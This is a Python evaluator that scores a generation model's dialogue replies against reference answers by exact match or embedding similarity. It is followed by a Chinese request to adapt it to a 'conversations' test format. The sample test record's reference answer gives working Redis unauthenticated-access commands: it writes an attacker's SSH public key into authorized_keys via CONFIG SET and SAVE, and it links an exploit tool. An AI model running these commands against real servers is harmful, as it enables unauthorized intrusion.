import os
import json
import torch
from tqdm import tqdm
from transformers import AutoTokenizer, AutoModelForCausalLM
from sentence_transformers import SentenceTransformer, util
class DialogueEvaluator:
    """Score a generation model's replies against reference answers.

    Each test sample is a prompt ("instruction") plus a reference answer
    ("reference"). A generated reply counts as correct when it equals the
    reference after stripping surrounding whitespace, or when the cosine
    similarity of the two sentence embeddings is >= ``similarity_threshold``.

    Accepted test-file layouts (a JSON array, a single JSON object, or JSON
    Lines with one object per line):

    * ``{"instruction": ..., "reference": ...}``
    * ShareGPT-style ``{"conversations": [{"from": "user", "value": ...},
      {"from": "assistant", "value": ...}, ...]}`` -- every user turn that is
      immediately followed by an assistant turn becomes one sample. Earlier
      turns are NOT passed to the model as context.
    """

    # Role names (compared case-insensitively) recognised in "conversations".
    USER_ROLES = ("user", "human")
    ASSISTANT_ROLES = ("assistant", "gpt")
    # Character-level cut applied to each text before embedding; the embedding
    # model may additionally truncate by tokens.
    MAX_EMBED_CHARS = 512

    def __init__(self,
                 test_data_path: str,
                 embed_model_path: str = "shibing624/text2vec-base-chinese",
                 gen_model_path: str = None,
                 similarity_threshold: float = 0.75,
                 device: str = "cuda" if torch.cuda.is_available() else "cpu",
                 max_new_tokens: int = 256,
                 temperature: float = 0.7,
                 top_p: float = 0.9,
                 do_sample: bool = True,
                 use_chat_template: bool = True):
        """Create the evaluator: load the test set, the embedding model and,
        optionally, a generation model.

        Args:
            test_data_path: Path to the test set (see the class docstring for
                the accepted layouts).
            embed_model_path: SentenceTransformer model name or path used to
                compute semantic similarity.
            gen_model_path: Optional local path of a causal LM. It is loaded
                only if the path exists; otherwise a warning is printed.
            similarity_threshold: Minimum cosine similarity counted as correct.
            device: Device for the embedding model. Also selects fp16 (any
                "cuda..." device) vs fp32, and placement of the generation model.
            max_new_tokens, temperature, top_p, do_sample: Generation settings.
                The defaults equal the values that used to be hard-coded.
                temperature/top_p are only passed when do_sample is True.
            use_chat_template: Wrap each prompt in the tokenizer's chat template
                when the tokenizer defines one; otherwise feed the raw prompt.

        Raises:
            ValueError: if a test record has an unrecognized layout.
        """
        self.device = device
        self.similarity_threshold = similarity_threshold
        self.max_new_tokens = max_new_tokens
        self.temperature = temperature
        self.top_p = top_p
        self.do_sample = do_sample
        self.use_chat_template = use_chat_template

        # Load and normalize the test set into {"instruction", "reference"} dicts.
        self.test_data = self._load_test_data(test_data_path)
        print(f"已加载测试样本 {len(self.test_data)} 条")

        print("加载文本嵌入模型...")
        self.embed_model = SentenceTransformer(
            embed_model_path, device=self.device
        )

        # Generation model state; stays empty unless loading succeeds.
        self.gen_model_loaded = False
        self.gen_tokenizer = None
        self.gen_model = None
        if gen_model_path and os.path.exists(gen_model_path):
            self._load_gen_model(gen_model_path)
        elif gen_model_path:
            # Previously a wrong path was skipped silently.
            print(f"⚠️ 生成模型路径不存在: {gen_model_path}")

    @classmethod
    def _load_test_data(cls, test_data_path: str) -> list:
        """Read the test file and return a list of normalized samples.

        Accepts a JSON array, a single JSON object, or JSON Lines.

        Raises:
            ValueError: if the top-level value is not an object/array, or a
                record has an unrecognized layout.
            json.JSONDecodeError: if the file is neither JSON nor JSON Lines.
        """
        # utf-8-sig also reads files saved with a BOM, which json.loads rejects.
        with open(test_data_path, 'r', encoding='utf-8-sig') as f:
            text = f.read()
        try:
            raw = json.loads(text)
        except json.JSONDecodeError:
            # Not a single JSON document: treat it as JSON Lines.
            raw = [json.loads(line) for line in text.splitlines() if line.strip()]
        if isinstance(raw, dict):
            raw = [raw]
        if not isinstance(raw, list):
            raise ValueError(f"测试数据顶层必须是对象或数组: {type(raw).__name__}")
        samples = []
        for record in raw:
            samples.extend(cls._normalize_record(record))
        return samples

    @classmethod
    def _normalize_record(cls, record) -> list:
        """Convert one raw record into zero or more {"instruction", "reference"} dicts.

        Raises:
            ValueError: if the record is not a dict, or has neither a
                "conversations" list nor both "instruction" and "reference".
        """
        if not isinstance(record, dict):
            raise ValueError(f"无法识别的测试样本类型: {type(record).__name__}")
        if "conversations" in record:
            turns = record["conversations"] or []
            samples = []
            # Pair each turn with the next one; keep (user -> assistant) pairs.
            for question, answer in zip(turns, turns[1:]):
                q_role = str(question.get("from", "")).lower()
                a_role = str(answer.get("from", "")).lower()
                if q_role in cls.USER_ROLES and a_role in cls.ASSISTANT_ROLES:
                    samples.append({
                        "instruction": question.get("value") or "",
                        "reference": answer.get("value") or "",
                    })
            return samples
        if "instruction" in record and "reference" in record:
            return [{
                "instruction": record["instruction"],
                "reference": record["reference"],
            }]
        raise ValueError(
            "无法识别的测试样本格式, 需要 instruction/reference 或 conversations 字段: "
            f"{sorted(record)}"
        )

    def _load_gen_model(self, gen_model_path: str) -> None:
        """Best-effort load of tokenizer + causal LM.

        On failure, prints the error and leaves the generation state empty.
        """
        print(f"尝试加载生成模型: {gen_model_path}...")
        # Accept "cuda", "cuda:0", torch.device("cuda", 1), ...
        on_cuda = str(self.device).startswith("cuda")
        try:
            # NOTE: trust_remote_code runs Python code shipped in the model
            # directory; only point this at trusted models.
            self.gen_tokenizer = AutoTokenizer.from_pretrained(
                gen_model_path,
                trust_remote_code=True,
                local_files_only=True,
            )
            self.gen_model = AutoModelForCausalLM.from_pretrained(
                gen_model_path,
                # On CPU, pin to the requested device instead of letting
                # "auto" grab a GPU the caller did not ask for.
                device_map="auto" if on_cuda else self.device,
                torch_dtype=torch.float16 if on_cuda else torch.float32,
                trust_remote_code=True,
                local_files_only=True,
            ).eval()
            self.gen_model_loaded = True
            print("✅ 生成模型加载成功")
        except Exception as e:
            # Deliberate best effort: continue without a generation model, but
            # do not keep a half-loaded tokenizer/model around.
            self.gen_tokenizer = None
            self.gen_model = None
            self.gen_model_loaded = False
            print(f"❌ 生成模型加载失败: {e}")

    def get_embedding(self, text: str) -> torch.Tensor:
        """Return the embedding of *text* as a tensor from the embedding model."""
        return self.embed_model.encode(text, convert_to_tensor=True)

    def _build_model_input(self, prompt: str):
        """Return (text, add_special_tokens) to feed to the tokenizer.

        Uses the tokenizer's chat template when enabled and defined, because
        chat-tuned models expect that wrapping. The rendered template already
        contains its special tokens, so they must not be added a second time.
        """
        chat_template = getattr(self.gen_tokenizer, "chat_template", None)
        if self.use_chat_template and chat_template:
            text = self.gen_tokenizer.apply_chat_template(
                [{"role": "user", "content": prompt}],
                tokenize=False,
                add_generation_prompt=True,
            )
            return text, False
        return prompt, True

    def generate_response(self, prompt: str) -> str:
        """Generate a reply to *prompt* with the loaded causal LM.

        Returns the placeholder "[未加载模型]" when no generation model is
        loaded. Tokenizer/model exceptions propagate to the caller; ``evaluate``
        catches them per sample.
        """
        if not self.gen_model_loaded:
            return "[未加载模型]"
        text, add_special_tokens = self._build_model_input(prompt)
        # With device_map="auto" the model may not sit on self.device, so send
        # the inputs to wherever the model reports itself to be.
        inputs = self.gen_tokenizer(
            text,
            return_tensors="pt",
            add_special_tokens=add_special_tokens,
        ).to(self.gen_model.device)
        gen_kwargs = {
            "max_new_tokens": self.max_new_tokens,
            "do_sample": self.do_sample,
        }
        if self.do_sample:
            gen_kwargs.update(temperature=self.temperature, top_p=self.top_p)
        # Tokenizers without a pad token otherwise trigger a pad_token_id warning.
        if (self.gen_tokenizer.pad_token_id is None
                and self.gen_tokenizer.eos_token_id is not None):
            gen_kwargs["pad_token_id"] = self.gen_tokenizer.eos_token_id
        with torch.inference_mode():
            outputs = self.gen_model.generate(**inputs, **gen_kwargs)
        # Decode only the newly generated tokens. Decoding everything and
        # str.replace-ing the prompt fails whenever detokenization does not
        # reproduce the prompt text exactly.
        prompt_len = inputs["input_ids"].shape[1]
        return self.gen_tokenizer.decode(
            outputs[0][prompt_len:],
            skip_special_tokens=True,
        ).strip()

    def evaluate_pair(self, text1: str, text2: str) -> dict:
        """Compare two texts.

        Returns:
            {"text1": str, "text2": str, "similarity": float,
             "is_correct": bool, "match_type": "exact" | "semantic"}
            An exact match (after strip()) short-circuits with similarity 1.0
            and does not call the embedding model.
        """
        if text1.strip() == text2.strip():
            return {
                "text1": text1,
                "text2": text2,
                "similarity": 1.0,
                "is_correct": True,
                "match_type": "exact",
            }
        emb1 = self.get_embedding(text1[:self.MAX_EMBED_CHARS])
        emb2 = self.get_embedding(text2[:self.MAX_EMBED_CHARS])
        # Cosine similarity: cos(theta) = (A . B) / (|A| * |B|)
        similarity = util.pytorch_cos_sim(
            emb1.unsqueeze(0),
            emb2.unsqueeze(0),
        ).item()
        return {
            "text1": text1,
            "text2": text2,
            "similarity": similarity,
            "is_correct": similarity >= self.similarity_threshold,
            "match_type": "semantic",
        }

    def _build_summary(self, results: list) -> dict:
        """Aggregate per-sample results.

        An empty result list yields accuracy 0.0 instead of dividing by zero.
        """
        total = len(results)
        correct = sum(1 for r in results if r["is_correct"])
        similarity_sum = sum(r["similarity"] for r in results)
        return {
            "total_samples": total,
            "accuracy": correct / total if total else 0.0,
            "correct_count": correct,
            "avg_similarity": similarity_sum / total if total else 0.0,
            "similarity_threshold": self.similarity_threshold,
            "gen_model_loaded": self.gen_model_loaded,
        }

    def evaluate(self, output_path: str = "evaluation_results.json"):
        """Generate and score a reply for every test sample, then save a JSON report.

        Returns:
            {"summary": {...}, "details": [per-sample dicts]}. A detail entry
            gets an extra "error" key, and is forced to is_correct=False, when
            generation raised.
        """
        if not self.gen_model_loaded:
            print("⚠️ 未加载生成模型, 生成结果均为占位符, 准确率无参考意义")
        results = []
        for sample in tqdm(self.test_data, desc="评估进度"):
            prompt = sample["instruction"]
            reference = sample["reference"]
            error = None
            try:
                generated = self.generate_response(prompt)
            except Exception as e:
                # tqdm.write prints without breaking the progress bar.
                tqdm.write(f"⚠️ 生成失败: {e}")
                generated = "[生成失败]"
                error = str(e)
            eval_result = self.evaluate_pair(reference, generated)
            if error is not None:
                # A failed generation must never count as correct, even if the
                # placeholder happens to resemble the reference.
                eval_result["is_correct"] = False
                eval_result["error"] = error
            results.append({
                "instruction": prompt,
                "reference": reference,
                "generated": generated,
                **eval_result,
            })

        summary = self._build_summary(results)
        final_results = {
            "summary": summary,
            "details": results,
        }
        out_dir = os.path.dirname(output_path)
        if out_dir:
            os.makedirs(out_dir, exist_ok=True)
        with open(output_path, 'w', encoding='utf-8') as f:
            json.dump(final_results, f, ensure_ascii=False, indent=2)
        print(f"\n✅ 评估完成! 准确率: {summary['accuracy']:.2%}")
        print(f"📊 结果已保存至: {output_path}")
        return final_results
# ============================ Usage example ============================
if __name__ == "__main__":
    # Evaluator settings; the paths below are placeholders to replace.
    evaluator_kwargs = {
        "test_data_path": "test_data.json",            # JSON test set
        "gen_model_path": "path/to/generation_model",  # optional generation model
        "embed_model_path": "text_embedding_model",    # sentence-embedding model
        "similarity_threshold": 0.75,                  # min similarity counted as correct
    }
    evaluator = DialogueEvaluator(**evaluator_kwargs)

    # Run the evaluation; the detailed report is written to disk as well.
    report = evaluator.evaluate(output_path="eval_results.json")

    # Echo only the summary section of the report.
    print("\n评估摘要:")
    print(json.dumps(report["summary"], indent=2))
测试集格式如下(每条样本是一个 JSON 对象,`conversations` 列表中依次给出用户提问和助手的参考回答):
{
"conversations": [
{
"from": "user",
"value": "如何通过SSH密钥注入获取Redis服务器访问权限?"
},
{
"from": "assistant",
"value": "前提条件:目标Redis实例允许匿名访问,已知Web目录路径为/var/www/html\n\n分步SSH密钥注入方法:\n\n1. **生成SSH密钥对**:\n```bash\nssh-keygen -t rsa -f redis_key\n```\n2. **格式化公钥并上传**:\n```bash\n(echo -e \"\\n\\n\"; cat redis_key.pub; echo -e \"\\n\\n\") | redis-cli -h 10.10.10.10 -x set ssh_key\n```\n3. **配置Redis存储路径**:\n```redis\nCONFIG SET dir /home/redis/.ssh\nCONFIG SET dbfilename \"authorized_keys\"\nSAVE\n```\n4. **SSH连接验证**:\n```bash\nssh -i redis_key redis@10.10.10.10\n```\n自动化工具推荐:https://github.com/Avinash-acid/Redis-Server-Exploit"
}
]
}
请修改上面的代码,使其能够读取这种 conversations 格式的测试集。